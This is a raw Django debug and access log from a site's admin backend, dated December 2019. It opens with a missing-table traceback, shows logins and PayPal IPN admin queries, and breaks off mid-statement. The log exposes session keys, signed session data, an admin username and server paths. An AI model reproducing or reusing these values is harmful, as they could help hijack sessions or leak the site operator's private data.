compiler.execute_sql(SINGLE) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "orders_order" does not exist LINE 1: SELECT COUNT(*) AS "__count" FROM "orders_order" ^ [03/Dec/2019 13:57:52] "GET /orders/order/ HTTP/1.0" 500 175128 DEBUG 2019-12-03 13:57:55,089 utils 7577 139709937760000 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-03T13:57:55.079823+00:00'::timestamptz AND "django_session"."session_key" = '7y9bdv74g6u1t80tonbni4iyfj8rht2u'); args=(datetime.datetime(2019, 12, 3, 13, 57, 55, 79823, tzinfo=), '7y9bdv74g6u1t80tonbni4iyfj8rht2u') DEBUG 2019-12-03 13:57:55,092 utils 7577 139709937760000 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-03 13:57:55,123 utils 7577 139709937760000 (0.002) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-03 13:57:55,126 utils 7577 139709937760000 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-17T13:57:55.125083+00:00'::timestamptz WHERE "django_session"."session_key" = '7y9bdv74g6u1t80tonbni4iyfj8rht2u'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 17, 13, 57, 55, 125083, tzinfo=), '7y9bdv74g6u1t80tonbni4iyfj8rht2u') [03/Dec/2019 13:57:55] "GET / HTTP/1.0" 200 6019 DEBUG 2019-12-03 13:57:57,385 utils 7577 139709937760000 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-03T13:57:57.372900+00:00'::timestamptz AND "django_session"."session_key" = '7y9bdv74g6u1t80tonbni4iyfj8rht2u'); args=(datetime.datetime(2019, 12, 3, 13, 57, 57, 372900, tzinfo=), '7y9bdv74g6u1t80tonbni4iyfj8rht2u') DEBUG 2019-12-03 13:57:57,388 utils 7577 139709937760000 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-03 13:57:57,397 utils 7577 139709937760000 (0.006) SELECT COUNT(*) AS "__count" FROM "paypal_ipn"; args=() DEBUG 2019-12-03 13:57:57,398 utils 7577 139709937760000 (0.000) SELECT COUNT(*) AS "__count" FROM "paypal_ipn"; args=() DEBUG 2019-12-03 13:57:57,411 utils 7577 139709937760000 (0.003) SELECT "paypal_ipn"."id", "paypal_ipn"."business", "paypal_ipn"."charset", "paypal_ipn"."custom", "paypal_ipn"."notify_version", "paypal_ipn"."parent_txn_id", "paypal_ipn"."receiver_email", "paypal_ipn"."receiver_id", "paypal_ipn"."residence_country", "paypal_ipn"."test_ipn", "paypal_ipn"."txn_id", "paypal_ipn"."txn_type", "paypal_ipn"."verify_sign", "paypal_ipn"."address_country", "paypal_ipn"."address_city", "paypal_ipn"."address_country_code", "paypal_ipn"."address_name", "paypal_ipn"."address_state", "paypal_ipn"."address_status", "paypal_ipn"."address_street", "paypal_ipn"."address_zip", "paypal_ipn"."contact_phone", "paypal_ipn"."first_name", "paypal_ipn"."last_name", "paypal_ipn"."payer_business_name", "paypal_ipn"."payer_email", "paypal_ipn"."payer_id", "paypal_ipn"."auth_amount", "paypal_ipn"."auth_exp", "paypal_ipn"."auth_id", "paypal_ipn"."auth_status", "paypal_ipn"."exchange_rate", "paypal_ipn"."invoice", "paypal_ipn"."item_name", "paypal_ipn"."item_number", "paypal_ipn"."mc_currency", "paypal_ipn"."mc_fee", "paypal_ipn"."mc_gross", "paypal_ipn"."mc_handling", "paypal_ipn"."mc_shipping", "paypal_ipn"."memo", "paypal_ipn"."num_cart_items", "paypal_ipn"."option_name1", "paypal_ipn"."option_name2", "paypal_ipn"."option_selection1", "paypal_ipn"."option_selection2", "paypal_ipn"."payer_status", "paypal_ipn"."payment_date", "paypal_ipn"."payment_gross", "paypal_ipn"."payment_status", "paypal_ipn"."payment_type", "paypal_ipn"."pending_reason", "paypal_ipn"."protection_eligibility", "paypal_ipn"."quantity", "paypal_ipn"."reason_code", "paypal_ipn"."remaining_settle", "paypal_ipn"."settle_amount", "paypal_ipn"."settle_currency", "paypal_ipn"."shipping", "paypal_ipn"."shipping_method", "paypal_ipn"."tax", "paypal_ipn"."transaction_entity", "paypal_ipn"."auction_buyer_id", "paypal_ipn"."auction_closing_date", "paypal_ipn"."auction_multi_item", "paypal_ipn"."for_auction", "paypal_ipn"."amount", "paypal_ipn"."amount_per_cycle", "paypal_ipn"."initial_payment_amount", "paypal_ipn"."next_payment_date", "paypal_ipn"."outstanding_balance", "paypal_ipn"."payment_cycle", "paypal_ipn"."period_type", "paypal_ipn"."product_name", "paypal_ipn"."product_type", "paypal_ipn"."profile_status", "paypal_ipn"."recurring_payment_id", "paypal_ipn"."rp_invoice_id", "paypal_ipn"."time_created", "paypal_ipn"."amount1", "paypal_ipn"."amount2", "paypal_ipn"."amount3", "paypal_ipn"."mc_amount1", "paypal_ipn"."mc_amount2", "paypal_ipn"."mc_amount3", "paypal_ipn"."password", "paypal_ipn"."period1", "paypal_ipn"."period2", "paypal_ipn"."period3", "paypal_ipn"."reattempt", "paypal_ipn"."recur_times", "paypal_ipn"."recurring", "paypal_ipn"."retry_at", "paypal_ipn"."subscr_date", "paypal_ipn"."subscr_effective", "paypal_ipn"."subscr_id", "paypal_ipn"."username", "paypal_ipn"."mp_id", "paypal_ipn"."case_creation_date", "paypal_ipn"."case_id", "paypal_ipn"."case_type", "paypal_ipn"."receipt_id", "paypal_ipn"."currency_code", "paypal_ipn"."handling_amount", "paypal_ipn"."transaction_subject", "paypal_ipn"."ipaddress", "paypal_ipn"."flag", "paypal_ipn"."flag_code", "paypal_ipn"."flag_info", "paypal_ipn"."query", "paypal_ipn"."response", "paypal_ipn"."created_at", "paypal_ipn"."updated_at", "paypal_ipn"."from_view" FROM "paypal_ipn" ORDER BY "paypal_ipn"."id" DESC; args=() DEBUG 2019-12-03 13:57:57,469 utils 7577 139709937760000 (0.002) SELECT MIN("paypal_ipn"."payment_date") AS "first", MAX("paypal_ipn"."payment_date") AS "last" FROM "paypal_ipn"; args=() DEBUG 2019-12-03 13:57:57,473 utils 7577 139709937760000 (0.002) SELECT DISTINCT DATE_TRUNC('year', "paypal_ipn"."payment_date") AS "datefield" FROM "paypal_ipn" WHERE "paypal_ipn"."payment_date" IS NOT NULL ORDER BY "datefield" ASC; args=() DEBUG 2019-12-03 13:57:57,477 utils 7577 139709937760000 (0.001) SELECT DISTINCT "paypal_ipn"."payment_status" FROM "paypal_ipn" ORDER BY "paypal_ipn"."payment_status" ASC; args=() DEBUG 2019-12-03 13:57:57,482 utils 7577 139709937760000 (0.001) SELECT DISTINCT "paypal_ipn"."txn_type" FROM "paypal_ipn" ORDER BY "paypal_ipn"."txn_type" ASC; args=() DEBUG 2019-12-03 13:57:57,501 utils 7577 139709937760000 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-17T13:57:57.499490+00:00'::timestamptz WHERE "django_session"."session_key" = '7y9bdv74g6u1t80tonbni4iyfj8rht2u'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 17, 13, 57, 57, 499490, tzinfo=), '7y9bdv74g6u1t80tonbni4iyfj8rht2u') [03/Dec/2019 13:57:57] "GET /ipn/paypalipn/ HTTP/1.0" 200 4104 [03/Dec/2019 13:57:57] "GET /static/admin/css/changelists.css HTTP/1.0" 200 6170 DEBUG 2019-12-03 13:57:57,863 utils 7577 139709937760000 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-03T13:57:57.852629+00:00'::timestamptz AND "django_session"."session_key" = '7y9bdv74g6u1t80tonbni4iyfj8rht2u'); args=(datetime.datetime(2019, 12, 3, 13, 57, 57, 852629, tzinfo=), '7y9bdv74g6u1t80tonbni4iyfj8rht2u') DEBUG 2019-12-03 13:57:57,865 utils 7577 139709937760000 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [03/Dec/2019 13:57:57] "GET /jsi18n/ HTTP/1.0" 200 3223 [03/Dec/2019 13:57:58] "GET /static/admin/js/jquery.init.js HTTP/1.0" 200 363 [03/Dec/2019 13:57:58] "GET /static/admin/js/vendor/jquery/jquery.js HTTP/1.0" 200 271817 [03/Dec/2019 13:57:58] "GET /static/admin/js/admin/RelatedObjectLookups.js HTTP/1.0" 200 6918 [03/Dec/2019 13:57:58] "GET /static/admin/js/core.js HTTP/1.0" 200 7099 [03/Dec/2019 13:57:58] "GET /static/admin/js/actions.js HTTP/1.0" 200 6766 [03/Dec/2019 13:57:58] "GET /static/admin/js/urlify.js HTTP/1.0" 200 8941 [03/Dec/2019 13:57:58] "GET /static/admin/js/prepopulate.js HTTP/1.0" 200 1530 [03/Dec/2019 13:57:58] "GET /static/admin/js/vendor/xregexp/xregexp.js HTTP/1.0" 200 128820 [03/Dec/2019 13:57:58] "GET /static/admin/img/search.svg HTTP/1.0" 200 458 [03/Dec/2019 13:58:00] "GET /static/admin/img/tooltag-add.svg HTTP/1.0" 200 331 DEBUG 2019-12-03 13:58:00,599 utils 7577 139709937760000 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-03T13:58:00.589635+00:00'::timestamptz AND "django_session"."session_key" = '7y9bdv74g6u1t80tonbni4iyfj8rht2u'); args=(datetime.datetime(2019, 12, 3, 13, 58, 0, 589635, tzinfo=), '7y9bdv74g6u1t80tonbni4iyfj8rht2u') DEBUG 2019-12-03 13:58:00,602 utils 7577 139709937760000 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [03/Dec/2019 13:58:00] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-03 13:58:01,937 utils 7577 139709937760000 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-03T13:58:01.928366+00:00'::timestamptz AND "django_session"."session_key" = '7y9bdv74g6u1t80tonbni4iyfj8rht2u'); args=(datetime.datetime(2019, 12, 3, 13, 58, 1, 928366, tzinfo=), '7y9bdv74g6u1t80tonbni4iyfj8rht2u') DEBUG 2019-12-03 13:58:01,940 utils 7577 139709937760000 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-03 13:58:01,989 utils 7577 139709937760000 (0.004) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-03 13:58:01,995 utils 7577 139709937760000 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-17T13:58:01.992568+00:00'::timestamptz WHERE "django_session"."session_key" = '7y9bdv74g6u1t80tonbni4iyfj8rht2u'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 17, 13, 58, 1, 992568, tzinfo=), '7y9bdv74g6u1t80tonbni4iyfj8rht2u') [03/Dec/2019 13:58:01] "GET / HTTP/1.0" 200 6019 [03/Dec/2019 13:58:19] "GET / HTTP/1.0" 302 0 [03/Dec/2019 14:03:24] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-03 14:08:17,581 utils 7577 139709937760000 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-03T14:08:17.571734+00:00'::timestamptz AND "django_session"."session_key" = 'ijwqsdrkmvg15cd2mj2d9vuzts12ybn2'); args=(datetime.datetime(2019, 12, 3, 14, 8, 17, 571734, tzinfo=), 'ijwqsdrkmvg15cd2mj2d9vuzts12ybn2') [03/Dec/2019 14:08:17] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-03 14:08:17,874 utils 7577 139709937760000 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-03T14:08:17.865026+00:00'::timestamptz AND "django_session"."session_key" = 'ijwqsdrkmvg15cd2mj2d9vuzts12ybn2'); args=(datetime.datetime(2019, 12, 3, 14, 8, 17, 865026, tzinfo=), 'ijwqsdrkmvg15cd2mj2d9vuzts12ybn2') DEBUG 2019-12-03 14:08:17,907 utils 7577 139709937760000 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-17T14:08:17.904711+00:00'::timestamptz WHERE "django_session"."session_key" = 'ijwqsdrkmvg15cd2mj2d9vuzts12ybn2'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 17, 14, 8, 17, 904711, tzinfo=), 'ijwqsdrkmvg15cd2mj2d9vuzts12ybn2') [03/Dec/2019 14:08:17] "GET /login/?next=/ HTTP/1.0" 200 1786 [03/Dec/2019 14:08:18] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [03/Dec/2019 14:08:18] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [03/Dec/2019 14:08:18] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [03/Dec/2019 14:08:18] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [03/Dec/2019 14:08:19] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [03/Dec/2019 14:08:19] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 Not Found: /favicon.ico [03/Dec/2019 14:08:20] "GET /favicon.ico HTTP/1.0" 404 6411 Not Found: /favicon.ico [03/Dec/2019 14:08:20] "GET /favicon.ico HTTP/1.0" 404 6411 [03/Dec/2019 14:08:29] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-03 14:09:20,857 utils 7577 139709850318592 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-03T14:09:20.848155+00:00'::timestamptz AND "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'); args=(datetime.datetime(2019, 12, 3, 14, 9, 20, 848155, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') DEBUG 2019-12-03 14:09:20,860 utils 7577 139709850318592 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-03 14:09:20,895 utils 7577 139709850318592 (0.003) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-03 14:09:20,899 utils 7577 139709850318592 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-17T14:09:20.897226+00:00'::timestamptz WHERE "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 17, 14, 9, 20, 897226, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') [03/Dec/2019 14:09:20] "GET / HTTP/1.0" 200 6019 [03/Dec/2019 14:09:21] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [03/Dec/2019 14:09:21] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [03/Dec/2019 14:09:21] "GET /static/admin/css/dashboard.css HTTP/1.0" 200 412 [03/Dec/2019 14:09:22] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [03/Dec/2019 14:09:22] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 200 331 [03/Dec/2019 14:09:22] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 200 380 [03/Dec/2019 14:09:23] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [03/Dec/2019 14:09:23] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [03/Dec/2019 14:09:23] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 Not Found: /favicon.ico [03/Dec/2019 14:09:25] "GET /favicon.ico HTTP/1.0" 404 6411 [03/Dec/2019 14:09:28] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-03 14:09:29,078 utils 7577 139709937760000 (0.006) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '2pfxjfspbtlcsr022pnuf8agj8p8becc' LIMIT 1; args=('2pfxjfspbtlcsr022pnuf8agj8p8becc',) DEBUG 2019-12-03 14:09:29,081 utils 7577 139709937760000 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('2pfxjfspbtlcsr022pnuf8agj8p8becc', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-17T14:09:29.079589+00:00'::timestamptz); args=('2pfxjfspbtlcsr022pnuf8agj8p8becc', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 17, 14, 9, 29, 79589, tzinfo=)) [03/Dec/2019 14:09:29] "GET /login/?next=/ HTTP/1.0" 200 1786 [03/Dec/2019 14:09:29] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [03/Dec/2019 14:09:29] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [03/Dec/2019 14:09:29] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [03/Dec/2019 14:09:29] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 Not Found: /favicon.ico [03/Dec/2019 14:09:30] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [03/Dec/2019 14:09:30] "GET /favicon.ico HTTP/1.0" 404 6411 [03/Dec/2019 14:09:30] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 DEBUG 2019-12-03 14:09:37,642 utils 7577 139709839828736 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-03T14:09:37.632802+00:00'::timestamptz AND "django_session"."session_key" = '2pfxjfspbtlcsr022pnuf8agj8p8becc'); args=(datetime.datetime(2019, 12, 3, 14, 9, 37, 632802, tzinfo=), '2pfxjfspbtlcsr022pnuf8agj8p8becc') DEBUG 2019-12-03 14:09:37,647 utils 7577 139709839828736 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'resfx-admin'; args=('resfx-admin',) DEBUG 2019-12-03 14:09:37,866 utils 7577 139709839828736 (0.001) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ay9kvr13id1l3mndywjjww8xf7h6o32m' LIMIT 1; args=('ay9kvr13id1l3mndywjjww8xf7h6o32m',) DEBUG 2019-12-03 14:09:37,867 utils 7577 139709839828736 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ay9kvr13id1l3mndywjjww8xf7h6o32m', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-17T14:09:37.866419+00:00'::timestamptz); args=('ay9kvr13id1l3mndywjjww8xf7h6o32m', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 17, 14, 9, 37, 866419, tzinfo=)) DEBUG 2019-12-03 14:09:37,869 utils 7577 139709839828736 (0.000) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE "django_session"."session_key" = '2pfxjfspbtlcsr022pnuf8agj8p8becc'; args=('2pfxjfspbtlcsr022pnuf8agj8p8becc',) DEBUG 2019-12-03 14:09:37,870 utils 7577 139709839828736 (0.000) DELETE FROM "django_session" WHERE "django_session"."session_key" IN ('2pfxjfspbtlcsr022pnuf8agj8p8becc'); args=('2pfxjfspbtlcsr022pnuf8agj8p8becc',) DEBUG 2019-12-03 14:09:37,872 utils 7577 139709839828736 (0.001) UPDATE "auth_user" SET "last_login" = '2019-12-03T14:09:37.871204+00:00'::timestamptz WHERE "auth_user"."id" = 6; args=(datetime.datetime(2019, 12, 3, 14, 9, 37, 871204, tzinfo=), 6) DEBUG 2019-12-03 14:09:37,875 utils 7577 139709839828736 (0.000) UPDATE "django_session" SET "session_data" = 